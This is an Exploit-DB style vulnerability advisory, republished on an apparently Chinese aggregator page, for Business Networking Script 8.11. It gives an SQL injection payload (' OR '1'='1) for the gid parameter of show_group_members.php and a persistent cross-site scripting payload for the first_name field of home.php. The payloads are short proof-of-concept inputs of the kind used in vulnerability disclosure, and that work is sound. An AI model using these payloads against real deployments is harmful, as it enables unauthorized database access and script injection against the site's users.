Business Networking Script 8.11 – SQL Injection / Cross-Site Scripting - 体验盒子

作者： Ahmet Gurel

日期： 2017-01-16

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/41075/

# Exploit Title : ----------- : Business Networking Script v8.11- SQLi &
Persistent Cross Site Scripting
# Author : -----------------: Ahmet Gurel
# Google Dork : ---------:-
# Date : -------------------- : 16/01/2017
# Type : -------------------- : webapps
# Platform : --------------- : PHP
# Vendor Homepage : http://itechscripts.com/business-networking-script/
# Sofware Price and Demo : $299.00
http://professional-network.itechscripts.com

 ########## 1-SQL Injection ##########

##### Vulnerable Parameter Type : GET
##### Vulnerable Parameter : gid
##### Vulnerable URL :
http://localhost/[PATH]/show_group_members.php?gid=[SQLi]
##### SQLi Parameter : ' OR '1'='1



########## 2-Persistent XSS Payload ##########

##### Vulnerable URL : http://localhost/[PATH]/home.php
##### Vuln. Parameter: first_name=
##### PAYLOAD : '"--></style></Script><Script>alert(1)</Script>